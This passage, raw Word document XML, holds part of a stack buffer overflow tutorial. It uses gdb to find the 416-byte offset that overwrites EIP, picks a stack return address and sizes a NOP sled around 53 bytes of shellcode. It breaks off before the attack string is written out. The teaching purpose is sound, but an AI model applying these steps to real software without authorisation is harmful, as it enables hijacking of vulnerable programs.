    <w:p w14:paraId="755CA2CE" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="397D8B22" wp14:editId="204F6774">
            <wp:extent cx="5943600" cy="24377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37765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDEB3A4" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The value “A” in hex is 41, so as you can see, the EIP has not been overwritten. One good thing to note is that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> handily tells you the EIP’s value in blue without you needing to type the </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">info reg </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. For the rest of the tutorial, I expect you to look at the value in blue to track with me.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639E8FB0" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2140874A" wp14:editId="4392D38F">
            <wp:extent cx="5943600" cy="22777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277745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FB4F8B" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">After a little trial and error, I found that 416 is the magic number to overwrite the EIP completely without going over. To illustrate this, I wrote 412 values of A into the buffer (41 in hex) and 4 values “BCDE” at the end (42, 43, 44, 45 in hex). As you can see, the EIP has the value </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>45444342</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in it. It has reversed order because my pc stores data in a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>little endian</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> way - as do most.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482763F5" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72CAFF32" wp14:editId="70AD10BB">
            <wp:extent cx="5943600" cy="22904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290445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A328D64" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Now it’s time to look at the stack to find a good return address for our exploit. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x/32z $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> will display 32 DWORDs of the stack at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7066F191" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A67C19B" wp14:editId="397B31E6">
            <wp:extent cx="5943600" cy="2732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32405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="384E4961" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hit enter to keep scrolling at this rate. You should see a ton of 41s on the stack from our input. The address I highlighted is near the top end of the buffer. It will be a good address to return to in the middle of our NOP region (refer to the earlier picture to see how we will structure this exploit). If you are following along, your address will likely be different.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E61D1E6" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46360F2F" wp14:editId="22F1549E">
            <wp:extent cx="5943600" cy="31248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24835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE3F37" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If we scroll a little farther down the stack, we see the value we overwrote the EIP with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128C18F2" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F48035F" wp14:editId="28B6226A">
            <wp:extent cx="5943600" cy="3226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26435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A5A80D" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now, let’s slow down a little bit and structure our attack. I don’t want to lose you in this somewhat confusing process!</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>1. We know that the region of 41s on the stack is our entire buffer up to the EIP</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>2. The value BCDE is what the EIP will be overwritten with.</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>3. Our return address is 0xffffd480</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252CADAD" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">What we need to find is the length of our shellcode so we can split the remaining </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>412 character</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> length of the buffer into NOP and the shellcode while keeping it the same length. I call an instance of python in the terminal (yes, I know 2.7 is outdated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>haha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>!) and find the length of our shellcode. It is 53 bytes long.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0F8D1B" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E52FA3F" wp14:editId="00573681">
            <wp:extent cx="5943600" cy="13042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304290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A514AE" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>buffer: 412 bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>shellcode: 53</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>NOP: 412 - 53 = 359 bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>return address: 4 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5917492D" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The no operation (NOP) instruction is </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x90</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>64 bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Intel architecture processors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5F27D3" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">So now our attack string looks like: </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
